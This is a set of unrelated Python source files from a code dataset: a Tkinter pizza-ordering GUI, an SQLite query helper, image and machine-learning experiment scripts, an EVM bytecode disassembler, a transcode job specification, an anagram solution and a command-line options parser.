self.scr1.mainloop() \r\n def menu(self):\r\n self.scr1.destroy()\r\n self.roo=Tk(className=\"MENU\")\r\n self.roo.geometry(\"1000x1000\")\r\n self.fra=Frame(self.roo,bg=\"DeepSkyBlue2\",height=800,width=2000)\r\n self.roo.config(bg=\"DeepSkyBlue2\")\r\n self.c=Canvas(self.fra,height=600,width=600)\r\n self.c.pack()\r\n self.roo.title(\"MENU\")\r\n #self.widget = Label(self.fra, compound='top')\r\n #self.widget.pizza1 = PhotoImage(file=\"pizza1.jpg\")\r\n #self.widget['image'] = widget.pizza1\r\n #self.widget.pack()\r\n self.v1=IntVar()\r\n self.v2=IntVar()\r\n self.v3=IntVar()\r\n self.v4=IntVar()\r\n self.v5=IntVar()\r\n self.v6=IntVar()\r\n self.labe=Label(self.fra,text=\"ITEM\",bg=\"DeepSkyBlue2\",font=(\"cooper black\",20))\r\n self.labe.place(x=150,y=30)\r\n self.labe1=Label(self.fra,text=\"PRICE\",bg=\"DeepSkyBlue2\",font=(\"cooper black\",20))\r\n self.labe1.place(x=350,y=30)\r\n self.labe2=Label(self.fra,text=\"Veg Pizza\",bg=\"white\",font=(\"default\",16))\r\n self.labe2.place(x=140,y=85)\r\n self.labe3=Label(self.fra,text=\"₹250\",bg=\"white\",font=(\"default\",16))\r\n self.labe3.place(x=365,y=85)\r\n self.labe2=Label(self.fra,text=\"Deluxe Veggie\",bg=\"white\",font=(\"default\",16))\r\n self.labe2.place(x=125,y=115)\r\n self.labe3=Label(self.fra,text=\"₹250\",bg=\"white\",font=(\"default\",16))\r\n self.labe3.place(x=365,y=115)\r\n self.labe2=Label(self.fra,text=\"Veg Vaganza\",bg=\"white\",font=(\"default\",16))\r\n self.labe2.place(x=125,y=145)\r\n self.labe3=Label(self.fra,text=\"₹250\",bg=\"white\",font=(\"default\",16))\r\n self.labe3.place(x=365,y=145)\r\n self.labe2=Label(self.fra,text=\"Pepper Pizza\",bg=\"white\",font=(\"default\",16))\r\n self.labe2.place(x=125,y=175)\r\n self.labe3=Label(self.fra,text=\"₹250\",bg=\"white\",font=(\"default\",16))\r\n self.labe3.place(x=365,y=175)\r\n self.labe2=Label(self.fra,text=\"Margherita\",bg=\"white\",font=(\"default\",16))\r\n self.labe2.place(x=135,y=205)\r\n self.labe3=Label(self.fra,text=\"₹195\",bg=\"white\",font=(\"default\",16))\r\n self.labe3.place(x=365,y=205)\r\n self.labe4=Label(self.fra,text=\"Cold Drink\",bg=\"white\",font=(\"default\",16))\r\n self.labe4.place(x=135,y=235)\r\n self.labe5=Label(self.fra,text=\"₹40\",bg=\"white\",font=(\"default\",16))\r\n self.labe5.place(x=365,y=235)\r\n self.labe6=Label(self.fra,text=\"Place your order here:\",bg=\"DeepSkyBlue2\",font=(\"Cooper black\",16))\r\n self.labe6.place(x=155,y=280)\r\n self.lab7=Label(self.fra,text=\"Item\",bg=\"white\",font=(\"default\",16))\r\n self.lab7.place(x=120,y=315)\r\n self.lab8=Label(self.fra,text=\"Quantity\",bg=\"white\",font=(\"default\",16))\r\n self.lab8.place(x=280,y=315)\r\n self.lab9=Label(self.fra,text=\"Veg Pizza\",bg=\"white\",font=(\"default\",16))\r\n self.lab9.place(x=90,y=350)\r\n self.v1=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v1.place(x=230,y=350)\r\n self.lab10=Label(self.fra,text=\"Deluxe Pizza\",bg=\"white\",font=(\"default\",16))\r\n self.lab10.place(x=85,y=385)\r\n self.v2=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v2.place(x=230,y=385)\r\n self.lab11=Label(self.fra,text=\"Veg Vaganza\",bg=\"white\",font=(\"default\",16))\r\n self.lab11.place(x=85,y=420)\r\n self.v3=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v3.place(x=230,y=420)\r\n self.lab12=Label(self.fra,text=\"Pepper Pizza\",bg=\"white\",font=(\"default\",16))\r\n self.lab12.place(x=85,y=455)\r\n self.v4=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v4.place(x=230,y=455)\r\n 
self.lab13=Label(self.fra,text=\"Margherita\",bg=\"white\",font=(\"default\",16))\r\n self.lab13.place(x=90,y=490)\r\n self.v5=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v5.place(x=230,y=490)\r\n self.lab14=Label(self.fra,text=\"Cold Drink\",bg=\"white\",font=(\"default\",16))\r\n self.lab14.place(x=90,y=525)\r\n self.v6=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v6.place(x=230,y=525)\r\n self.to=Button(self.fra,text=\"Submit\",font=(\"cooper black\",20),bg=\"DeepSkyBlue3\",fg=\"black\",command=lambda: self.validate(self.v1.get(), self.v2.get(), self.v3.get(), self.v4.get(), self.v5.get(), self.v6.get()))\r\n self.to.place(x=250,y=565)\r\n self.to.pack(fill=BOTH,expand=1)\r\n self.fra.pack()\r\n self.roo.mainloop()\r\n def order(self):\r\n self.scr2=Tk(className=\"Place Order\")\r\n self.scr2.geometry(\"450x300\")\r\n self.scr2.resizable(False, False)\r\n self.scr2.title(\"Place Order\")\r\n self.scr2.config(bg=\"DeepSkyBlue2\")\r\n self.fram=Frame(self.scr2,height=618,width=1366,bg=\"DeepSkyBlue2\")\r\n #self.v1.set(\"0\")\r\n self.a=self.v1.get()\r\n self.b=self.v2.get()\r\n self.c=self.v3.get()\r\n self.d=self.v4.get()\r\n self.e=self.v5.get()\r\n self.f=self.v6.get()\r\n #print(self.a)\r\n if len(self.a)==0:\r\n self.a=\"0\"\r\n #print(self.a)\r\n if len(self.b)==0:\r\n self.b=\"0\"\r\n #print(self.b)\r\n if len(self.c)==0:\r\n self.c=\"0\"\r\n #print(self.c)\r\n if len(self.d)==0:\r\n self.d=\"0\"\r\n #print(self.d)\r\n if len(self.e)==0:\r\n self.e=\"0\"\r\n #print(self.e)\r\n if len(self.f)==0:\r\n self.f=\"0\"\r\n #print(self.f)\r\n #print(self.a)\r\n self.sum=int(self.a)*250+int(self.b)*250+int(self.c)*250+int(self.d)*250+int(self.e)*195+int(self.f)*40\r\n self.gst=(18/100)*int(self.sum)\r\n self.tot=int(self.gst)+int(self.sum)\r\n #self.tot=\"₹ \"+str(int(((self.a)*250)+((self.b)*250)+((self.c)*250)+((self.d)*250)+((self.e)*195)+((self.f)*40)))\r\n #print(self.sum)\r\n self.labell=Label(self.fram,text=\"Total payable amount is \",bg=\"DeepSkyblue2\",font=(\"default\",16))\r\n self.label2=Label(self.fram,text=\"GST(18%) \",bg=\"DeepSkyblue2\",font=(\"default\",16))\r\n self.label3=Label(self.fram,text=\"Total: \",bg=\"DeepSkyblue2\",font=(\"default\",16))\r\n self.labell.place(x=90,y=110)\r\n self.label2.place(x=90,y=70)\r\n self.label3.place(x=90,y=30)\r\n #self.dis=Entry(self.fram,text=\"%s\" %(self.tot),bg=\"white\",font=(\"default\",16))\r\n self.val=Label(self.fram,text=self.sum,bg=\"white\",font=(\"default\",16))\r\n self.val2=Label(self.fram,text=self.gst,bg=\"white\",font=(\"default\",16))\r\n self.val3=Label(self.fram,text=self.tot,bg=\"white\",font=(\"default\",16))\r\n self.insertinto(self.a, self.b, self.c, self.d, self.e, self.f, self.sum, self.gst, self.tot)\r\n self.val.place(x=320,y=110)\r\n self.val2.place(x=320,y=70)\r\n self.val3.place(x=320,y=30)\r\n self.fram.pack()\r\n self.scr2.mainloop()\r\n\r\n def result(self):\r\n self.username=self.user.get()\r\n self.password=self.pasd.get()\r\n try:\r\n self.scr.destroy()\r\n except:\r\n try:\r\n self.scr1.destroy()\r\n except:\r\n pass\r\n def clear(self):\r\n self.user.delete(0,END)\r\n self.pasd.delete(0,END)\r\n def values(self):\r\n self.login()\r\n return self.username,self.password\r\n\r\na= Log()\r\na.home()\r\ndb.commit()\r\n","sub_path":"pizzamgmt.py","file_name":"pizzamgmt.py","file_ext":"py","file_size_in_byte":15703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"69874307","text":"import sqlite3\n\nclass 
DataAccess(object):\n db = r'C:\\Users\\Chris\\Documents\\GitHub\\CPE169P-Requirements\\Mod2_MP1\\sqlite_02\\chinook.db'\n def __init__(self):\n \"\"\" constructor \"\"\"\n self.conn = sqlite3.connect(self.db)\n self.cur = self.conn.cursor()\n def close(self):\n \"\"\" close db connection \"\"\"\n self.conn.close()\n def executeQuery(self,query):\n self.cur.execute(query)\n return self.cur.fetchall()\n \n def commit(self):\n \"\"\" commit changes to db \"\"\"\n self.conn.commit()\n\nif __name__=='__main__':\n da = DataAccess()\n if da is not None:\n print(da.executeQuery('SELECT InvoiceId, BillingAddress, \\\n Total FROM invoices\\\n WHERE Total BETWEEN 14.91 and 18.86 ORDER BY Total'))\n print(da.executeQuery('SELECT albumid, COUNT(trackid) \\\n FROM tracks GROUP BY albumid;'))\n print(da.executeQuery('SELECT Title, Name FROM albums\\\n INNER JOIN artists ON artists.ArtistId = albums.ArtistId;'))\n print(da.executeQuery('''SELECT trackid, name, albumid FROM tracks WHERE albumid = (SELECT albumid FROM albums WHERE title='Let There Be Rock');'''))\n print(da.executeQuery('''\n SELECT customerid,\n firstname,\n lastname\n FROM customers\n WHERE supportrepid IN (\n SELECT employeeid\n FROM employees\n WHERE country = 'Canada'\n );\n '''))\n \n \n\n","sub_path":"Mod2_MP1/sqlite_02/fetchdata.py","file_name":"fetchdata.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"166373440","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys, os, math\nimport cv2 as cv\nimport Image\nfrom em import *\n\nif __name__ == \"__main__\":\n\n filename3 = sys.argv[1]\n filename4 = sys.argv[2]\n filename5 = sys.argv[3]\n mid = float(sys.argv[4])\n\n data3 = cv.imread(filename3).astype(np.double)\n data4 = cv.imread(filename4).astype(np.double)\n data5 = cv.imread(filename5).astype(np.double)\n\n data_city = (data5 - data4) / (data5 + data4)\n\n data_plnt = (data4 - data3) / (data4 + data3)\n data_plnt_flat = data_plnt[np.where(data_city < mid)].reshape((1,data_plnt[np.where(data_city < mid)].size))[0]\n np.random.shuffle(data_plnt_flat)\n em = expmax(data_plnt_flat[:40000], 3)\n\n ans = em.estimate()\n print(ans)\n plt.figure()\n em.draw()\n plt.show()\n\n","sub_path":"tool_old/detect_plnt.py","file_name":"detect_plnt.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"94891909","text":"import argparse\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.semi_supervised import label_propagation\r\nfrom sklearn.decomposition import TruncatedSVD\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import roc_curve,auc\r\nfrom keras.models import model_from_yaml\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.ensemble import AdaBoostClassifier\r\nfrom keras import optimizers\r\nimport re\r\nfrom sklearn.model_selection import StratifiedShuffleSplit, train_test_split\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\r\nfrom collections import defaultdict\r\nimport pickle\r\nimport random\r\nimport Extract_fe as data\r\nimport matplotlib.pyplot as plt\r\nimport pymrmr\r\n\r\n\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n\r\n 
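# each add_argument call below registers one CLI flag; parse_args() exposes them as attributes of a namespace\r\n 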
parser.add_argument(\r\n '-X', '--Xfile',\r\n help='File with X data',\r\n type=str,\r\n default=None,\r\n dest='X_filename'\r\n )\r\n\r\n parser.add_argument(\r\n '-y', '--yfile',\r\n help='File with y data',\r\n type=str,\r\n default=None,\r\n dest='y_filename'\r\n )\r\n\r\n parser.add_argument(\r\n '-an', '--add_n',\r\n type=int,\r\n default=1,\r\n help='Add n samples from pool per training loop (default: 1)',\r\n dest='add_n'\r\n )\r\n\r\n parser.add_argument(\r\n '-t', '--threshold',\r\n type=float,\r\n default=0.7,\r\n help='Desired threshold for accuracy on test set (default: 0.7)',\r\n dest='threshold'\r\n )\r\n\r\n return parser.parse_args()\r\n\r\n\r\ndef train_test_split_rand(X, y, test_size=0.2, seed=None):\r\n \"\"\"Split a dataset into training and test at random\r\n Parameters\r\n ----------\r\n X : np.array\r\n Features of the dataset\r\n y : np.array\r\n Labels of the dataset\r\n test_size : float, optional\r\n Percentage of data in test set, by default 0.2\r\n seed : int, optional\r\n Seed for Random State, by default None\r\n Returns\r\n -------\r\n X_train, X_test, y_train, y_test\r\n Splitted data\r\n \"\"\"\r\n\r\n # X = X.values\r\n # y = y.values\r\n\r\n # split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=seed)\r\n\r\n # print(X_train.shape)\r\n return X_train, X_test, y_train, y_test\r\n\r\n\r\n\r\ndef calc_performance(y_test, pred_y, test_num,prefix=''):\r\n \"\"\"Calculate performance metrics between predicted labels and true labels\r\n Parameters\r\n ----------\r\n y_test : [type]\r\n [description]\r\n pred_y : [type]\r\n [description]\r\n prefix : str, optional\r\n [description], by default ''\r\n Returns\r\n -------\r\n [type]\r\n [description]\r\n \"\"\"\r\n tp = 0\r\n fp = 0\r\n tn = 0\r\n fn = 0\r\n for index in range(test_num):\r\n if y_test[index] == 1:\r\n if y_test[index] == pred_y[index]:\r\n tp = tp + 1\r\n else:\r\n fn = fn + 1\r\n else:\r\n if y_test[index] == pred_y[index]:\r\n tn = tn + 1\r\n else:\r\n fp = fp + 1\r\n # print('tp:', tp, 'fn:', fn, 'tn:', tn, 'fp:', fp)\r\n acc = (tp + tn) / (tp + tn+fp+fn)\r\n precision = precision_score(y_true=y_test, y_pred=pred_y, zero_division=0)\r\n recall=(tp) / (tp + fn)\r\n f1=2*precision*recall/(precision+recall)\r\n fpr, tpr, thresholds = roc_curve(y_test, pred_y) # probas_[:, 1])\r\n auc = metrics.auc(fpr, tpr)\r\n # auc=metrics.roc_auc_score(y_test, pred_y)\r\n # print(auc)\r\n print(f\"{prefix} Accuracy: {acc:.3f}, Recall: {recall:.3f}, Precision: {precision:.3f}, F1-score: {f1:.3f}, AUC: {auc:.3f}\",'tp:', tp, 'fn:', fn, 'tn:', tn, 'fp:', fp)\r\n\r\n return acc, recall, precision, f1, auc\r\n\r\n\r\n\r\ndef rand_sampling(X_pool, y_pool, X_test, y_test, model, model_args, add_n=2, n_init=50, steps=None, verbose=0,\r\n threshold=0.7):\r\n \"\"\"Random selection with pool-based sampling\r\n Parameters\r\n ----------\r\n X_pool : numpy.array\r\n Features in pool\r\n y_pool : numpy.array\r\n Labels in pool\r\n X_test : numpy.array\r\n Features in test\r\n y_test : numpy.array\r\n Labels in test\r\n model : sklearn.model\r\n Sklearns implementation of a model,\r\n MLPClassifier,KNeighborsClassifier,AdaBoostClassifier or label_propagation\r\n model_args : dict\r\n Arguments for model function\r\n add_n : int, optional\r\n How many samples to add at each iteration, by default 2\r\n n_init : int, optional\r\n How many samples from pool are in the training data in the first iteration, by default 50\r\n steps : int, optional\r\n Number of 
iterations to run. If None, then run until all samples from pool have been used or if threshold given, stop when threshold is reached, by default None\r\n verbose : int, optional\r\n If 1, print test performance in each iteration, by default 0\r\n threshold : float, optional\r\n If given, stop learning system if accuracy score on test set is >= threshold, by default 0.7\r\n Returns\r\n -------\r\n clf : sklearn.model\r\n Trained classifier\r\n test_acc, test_recall, test_precision, test_f1: lists\r\n Performance measures on test set at each iteration\r\n \"\"\"\r\n\r\n # mix up order of pool indexes\r\n order = np.random.permutation(range(len(X_pool)))\r\n\r\n # initialize poolidxs\r\n poolidxs = np.arange(len(X_pool))\r\n\r\n # take n_init samples from pool as training set\r\n # print(order)\r\n trainset = order[:n_init]\r\n # print(trainset)\r\n X_train = X_pool[trainset]\r\n y_train = y_pool[trainset]\r\n\r\n print(model)\r\n # remove the first n_init idxs from poolidxs\r\n poolidxs = np.setdiff1d(poolidxs, trainset)\r\n\r\n # initialize model\r\n clf = model(**model_args)\r\n\r\n if steps is None:\r\n steps = len(poolidxs) // 1\r\n\r\n\r\n\r\n # training loop\r\n test_acc, test_recall, test_precision, test_f1, AUC = [], [], [], [],[]\r\n for i in range(steps):\r\n count = 0\r\n # fit model\r\n clf.fit(X_train, y_train.ravel())#.ravel()\r\n\r\n # calculate performance on test set\r\n y_pred = clf.predict(X_test)\r\n\r\n\r\n test_num=len(X_test)\r\n acc, recall, precision, f1, auc = calc_performance(y_test=y_test, pred_y=y_pred,test_num=test_num)\r\n test_acc.append((len(X_train), acc))\r\n # test_recall.append((len(X_train), recall))\r\n test_precision.append((len(X_train), precision))\r\n # test_f1.append((len(X_train), f1))\r\n\r\n # calculate label probabilities for samples remaining in pool\r\n y_prob = clf.predict_proba(X_pool[poolidxs])\r\n\r\n new_order = np.random.permutation(range(len(y_prob)))\r\n new_idx = new_order[:add_n]\r\n\r\n X_add = X_pool[new_idx]\r\n y_add = y_pool[new_idx]\r\n\r\n X_train = np.concatenate((\r\n X_train,\r\n X_add\r\n ))\r\n y_train = np.concatenate((\r\n y_train,\r\n y_add\r\n ))\r\n\r\n\r\n # remove from pool\r\n poolidxs = np.setdiff1d(poolidxs, new_idx)\r\n\r\n if verbose == 1:\r\n print(f\"Step {i + 1}/{steps}: Test accuracy: {acc:.3f}\", end='\\r')\r\n\r\n if threshold is not None and acc >= threshold:\r\n print(\"Desired accuracy reached. 
Stopping training.\")\r\n break\r\n # if steps % 3 == 0:\r\n\r\n # np.savetxt(\"result.txt\", X_train)\r\n count+=1\r\n # show(X_train, y_train, X_test, y_pred,count)\r\n\r\n return clf, test_acc, test_recall, test_precision, test_f1\r\n\r\n\r\ndef train(X, y, split_func, sampling_func, add_n, steps=30, model=label_propagation.LabelSpreading, model_args={}, split_args={}):\r\n\r\n\r\n X_train, X_test, y_train, y_test = split_func(X, y, **split_args)\r\n\r\n _, test_acc, test_recall, test_precision, test_f1 = rand_sampling(\r\n X_pool=X_train,\r\n X_test=X_test,\r\n y_pool=y_train,\r\n y_test=y_test,\r\n model=model,\r\n model_args=model_args,\r\n verbose=1,\r\n add_n=add_n,\r\n n_init=add_n,\r\n threshold=None,\r\n steps=30\r\n )\r\n\r\n return test_acc, test_recall, test_precision, test_f1\r\n\r\n\r\ndef dd():\r\n return defaultdict(dict)\r\n\r\n\r\ndef show(Mat_Label, labels, Mat_Unlabel, unlabel_data_labels,count):\r\n plt.style.use('ggplot')\r\n for i in range(Mat_Label.shape[0]):\r\n\r\n if int(labels[i]) == 0:\r\n line1=plt.plot(Mat_Label[i, 0], Mat_Label[i, 1], 'Dm',markersize=4,)\r\n\r\n elif int(labels[i]) == 1:\r\n line2=plt.plot(Mat_Label[i, 0], Mat_Label[i, 1], 'Db',markersize=4)\r\n # plt.legend()\r\n # else:\r\n # plt.plot(Mat_Label[i, 0], Mat_Label[i, 1], 'Dy')\r\n\r\n for i in range(Mat_Unlabel.shape[0]):\r\n if int(unlabel_data_labels[i]) == 0:\r\n plt.plot(Mat_Unlabel[i, 0], Mat_Unlabel[i, 1], 'om',markersize=4,)\r\n # plt.legend()\r\n elif int(unlabel_data_labels[i]) == 1:\r\n plt.plot(Mat_Unlabel[i, 0], Mat_Unlabel[i, 1], 'ob',markersize=4)\r\n # plt.legend()\r\n # else:\r\n # plt.plot(Mat_Unlabel[i, 0], Mat_Unlabel[i, 1], 'oy',markersize=4)\r\n\r\n\r\n plt.xlabel('X1')\r\n plt.ylabel('X2')\r\n # plt.legend(handles=[line1,line2,line3,line4],labels=['label(0)', 'label(1)','ulabel(0)','ulabel(1)'])\r\n\r\n plt.xlim(-0.05, 0.25)\r\n plt.ylim(-0.07, 0.05)\r\n plt.rcParams['savefig.dpi'] = 300\r\n # plt.savefig(\"C:\\\\Users\\\\86151\\\\Desktop\\\\2021\\\\picture\\\\san\\\\temp{}.jpg\".format(count))\r\n # plt.savefig(\"D:/figures/temp{}.png\".format(i))\r\n\r\n plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n args = parse_args()\r\n\r\n # load files\r\n\r\n label, pto = data.read_sequence()\r\n\r\n aac = data.fe()\r\n\r\n dpc = data.DPC()\r\n # pca = PCA(n_components=100)\r\n # pca = pca.fit(dpc)\r\n # dpc= pca.transform(dpc)\r\n # dpc= np.array(dpc)\r\n\r\n # gaac=data.gaac()\r\n\r\n pcp = data.PC_PseAAC()\r\n\r\n bpf = data.get_bpf()\r\n\r\n\r\n\r\n X = np.concatenate((bpf,pcp,aac,dpc), axis=1)\r\n # X=pcp\r\n # print(X.shape)\r\n # pca = PCA(n_components=300)\r\n # pca = pca.fit(X)\r\n # X = pca.transform(X)\r\n # X = np.array(X)\r\n\r\n y = label\r\n\r\n X=np.array(X,dtype=np.float32)\r\n y=np.array(y,dtype=np.float32)\r\n\r\n\r\n # parameter settings for classifiers\r\n models = {\r\n\r\n 'Neural Network': {\r\n 'model': MLPClassifier,\r\n 'model_args': {\r\n 'max_iter': 1000,\r\n 'random_state' :0\r\n }\r\n },\r\n 'AdaBoostClassifier':{\r\n 'model':AdaBoostClassifier,\r\n 'model_args': {\r\n 'n_estimators': 200,\r\n 'learning_rate': 0.01,\r\n 'random_state': 100\r\n\r\n }\r\n },\r\n 'label_propagation':{\r\n 'model':label_propagation.LabelSpreading,\r\n 'model_args': {\r\n 'gamma':0.25,\r\n 'max_iter':15\r\n }\r\n },\r\n\r\n 'KNeighborsClassifier':{\r\n 'model':KNeighborsClassifier,\r\n 'model_args':{\r\n 'n_neighbors' : 8\r\n\r\n }\r\n }\r\n\r\n }\r\n\r\n # functions and settings for data splitters\r\n split_funcs = [train_test_split_rand]\r\n split_args = {\r\n 
'Random': [{}],\r\n }\r\n split_keys = ['Random']\r\n\r\n # dict to store results in\r\n res = defaultdict(dd)\r\n\r\n # test each combination\r\n for model_name, model_settings in models.items():\r\n for split_func, split_key in zip(split_funcs, split_keys):\r\n for split_arg in split_args[split_key]:\r\n\r\n split_label = split_key\r\n if 'Random positive sampling' == split_key:\r\n split_label = split_key.replace('Random', f\"{split_arg['pos_frac'] * 100}%\")\r\n\r\n for i in range(15): # repeat 15 times\r\n print(f\"{model_name} {split_label} - iteration: {i + 1}/15\")\r\n\r\n # set random seed\r\n random.seed()\r\n\r\n test_acc, test_recall, test_precision, test_f1 = train(\r\n X=X,\r\n y=y,\r\n split_func=split_func,\r\n sampling_func=rand_sampling,\r\n add_n=args.add_n,\r\n model=model_settings['model'],\r\n model_args=model_settings['model_args'],\r\n split_args=split_arg\r\n )\r\n\r\n res[model_name][split_label][i] = {\r\n # 'test_acc': test_acc,\r\n 'test_recall': test_recall,\r\n 'test_precision': test_precision,\r\n 'test_f1': test_f1\r\n }\r\n\r\n # dump result dict in a pickled file\r\n with open('results.pkl', 'wb') as dest:\r\n pickle.dump(res, dest)","sub_path":"SLPM.py","file_name":"SLPM.py","file_ext":"py","file_size_in_byte":12956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"230802976","text":"from mythril.ether import asm,util\nimport os\nimport json\n\n\nclass Disassembly:\n\n def __init__(self, code):\n self.instruction_list = asm.disassemble(util.safe_decode(code))\n self.xrefs = []\n self.func_to_addr = {}\n self.addr_to_func = {}\n\n # Parse jump table & resolve function names\n\n script_dir = os.path.dirname(os.path.realpath(__file__))\n signature_file = os.path.join(script_dir, 'signatures.json')\n\n with open(signature_file) as f:\n signatures = json.load(f)\n\n jmptable_indices = asm.find_opcode_sequence([\"PUSH4\", \"EQ\"], self.instruction_list)\n\n for i in jmptable_indices:\n func_hash = self.instruction_list[i]['argument']\n try:\n func_name = signatures[func_hash]\n except KeyError:\n func_name = \"_function_\" + func_hash\n\n try:\n offset = self.instruction_list[i+2]['argument']\n jump_target = int(offset, 16)\n\n self.func_to_addr[func_name] = jump_target\n self.addr_to_func[jump_target] = func_name\n except:\n continue\n\n\n\n def get_easm(self):\n\n return asm.instruction_list_to_easm(self.instruction_list)\n","sub_path":"mythril/disassembler/disassembly.py","file_name":"disassembly.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"251060724","text":"from __future__ import annotations\n\nfrom media_platform.job.job import Job\nfrom media_platform.job.specification import Specification\nfrom media_platform.job.transcode.audio_qualities import AudioQuality\nfrom media_platform.job.transcode.clipping import Clipping\nfrom media_platform.job.transcode.stream_specification import StreamSpecification\nfrom media_platform.job.transcode.video_qualities import VideoQualityRange, VideoQuality\nfrom media_platform.service.destination import Destination\n\n\nclass TranscodeSpecification(Specification):\n def __init__(self, destination: Destination, video: StreamSpecification = None, audio: StreamSpecification = None,\n quality_range: VideoQualityRange = None, quality: AudioQuality or VideoQuality = None,\n clipping: Clipping = None):\n self.destination = destination\n self.video = video\n self.audio = 
audio\n self.quality_range = quality_range\n self.quality = quality\n self.clipping = clipping\n\n @classmethod\n def deserialize(cls, data: dict) -> TranscodeSpecification:\n destination = Destination.deserialize(data['destination'])\n\n video_data = data.get('video')\n video = StreamSpecification.deserialize(video_data) if video_data else None\n\n audio_data = data.get('audio')\n audio = StreamSpecification.deserialize(audio_data) if audio_data else None\n\n quality_range_data = data.get('qualityRange')\n quality_range = VideoQualityRange.deserialize(quality_range_data) if quality_range_data else None\n\n quality = data.get('quality')\n\n clipping_data = data.get('clipping')\n clipping = Clipping.deserialize(clipping_data) if clipping_data else None\n\n return TranscodeSpecification(destination, video, audio, quality_range, quality, clipping)\n\n def serialize(self) -> dict:\n return {\n 'destination': self.destination.serialize(),\n 'video': self.video.serialize() if self.video else None,\n 'audio': self.audio.serialize() if self.audio else None,\n 'qualityRange': self.quality_range.serialize() if self.quality_range else None,\n 'quality': self.quality,\n 'clipping': self.clipping.serialize() if self.clipping else None\n }\n\n def validate(self):\n stream_specified = (self.video or self.audio)\n quality_specified = (self.quality_range or self.quality)\n\n if self.quality_range:\n self.quality_range.validate()\n\n if self.video:\n self.video.validate()\n\n if self.audio:\n self.audio.validate()\n\n if stream_specified and quality_specified:\n raise ValueError('Either stream specification or quality may be specified, not both')\n\n if self.quality_range and self.quality:\n raise ValueError('Either quality range or quality may be specified, not both')\n\n if self.quality and not VideoQuality.has_value(self.quality) and not AudioQuality.has_value(self.quality):\n raise ValueError('Quality %s is not supported' % self.quality)\n\n if not stream_specified and not quality_specified and not self.clipping:\n raise ValueError('Either video, audio, quality range, quality or clipping must be specified')\n\n\nclass TranscodeJob(Job):\n type = 'urn:job:av.transcode'\n specification_type = TranscodeSpecification\n","sub_path":"media_platform/job/transcode_job.py","file_name":"transcode_job.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"295506981","text":"from typing import List\nimport operator\nimport numpy as np\n\n\"\"\"\nValid Anagram\n\"\"\"\n\n\nclass Solution:\n def isAnagram_1(self, s: str, t: str) -> bool:\n \"\"\"\n Works, but the time complexity is high and it exceeds the time limit\n :param s:\n :param t:\n :return:\n \"\"\"\n if len(s) != len(t):\n return False\n t_b = [True]*len(t)\n b = False\n for i in s:\n for j_pos, j in enumerate(t):\n if t_b[j_pos]:\n if i == j:\n b = True\n t_b[j_pos] = False\n break\n if not b:\n return b\n if np.sum(np.array(t_b) == 1) == 0:\n return True\n else:\n return False\n\n def isAnagram_2(self, s: str, t: str) -> bool:\n \"\"\"\n Count occurrences at each of the 26 letter positions: +1 for each letter in s, -1 for each letter in t;\n :param s:\n :param t:\n :return:\n \"\"\"\n if len(s) != len(t):\n return False\n l_str = [0]*26\n for i in s:\n l_str[ord(i)-97] += 1\n for j in t:\n l_str[ord(j)-97] -= 1\n\n if np.sum(np.array(l_str) == 0) == 26:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n s = \"rat\"\n t = \"tar\"\n solution = Solution()\n print(solution.isAnagram_2(s, 
t))\n","sub_path":"Week_08/week_08_isAnagram.py","file_name":"week_08_isAnagram.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"393163565","text":"import argparse\nimport json, os\n\nclass BaseOptions():\n def __init__(self):\n self.initialized = False\n\n def initialize(self, parser):\n # Datasets related\n g_data = parser.add_argument_group('Data')\n g_data.add_argument('--dataroot', type=str, default='./data', help='path to images (data folder)')\n g_data.add_argument('--tensorboard_path', type=str, default='./trainedModels/logs_pifu/', help='path to tensorboard logs')\n g_data.add_argument('--loadSize', type=int, default=512, help='load size of input image')\n g_data.add_argument('--use_normal_input', action='store_true')\n\n # Experiment related\n g_exp = parser.add_argument_group('Experiment')\n g_exp.add_argument('--name', type=str, default='multiview_pifu', help='name of the experiment')\n g_exp.add_argument('--debug', action='store_true', help='debug mode or not')\n g_exp.add_argument('--num_views', type=int, default=1, help='How many views to use for multiview network.')\n g_exp.add_argument('--render_normals', action='store_true')\n g_exp.add_argument('--super_res', action='store_true')\n g_exp.add_argument(\"--regression\", action='store_true')\n\n # Training related\n g_train = parser.add_argument_group('Training')\n g_train.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2, -1 for CPU mode')\n g_train.add_argument('--num_threads', default=1, type=int, help='#threads for loading data')\n g_train.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')\n g_train.add_argument('--same_test_data', action='store_true', help='if true, always use the same test data')\n g_train.add_argument('--pin_memory', action='store_true', 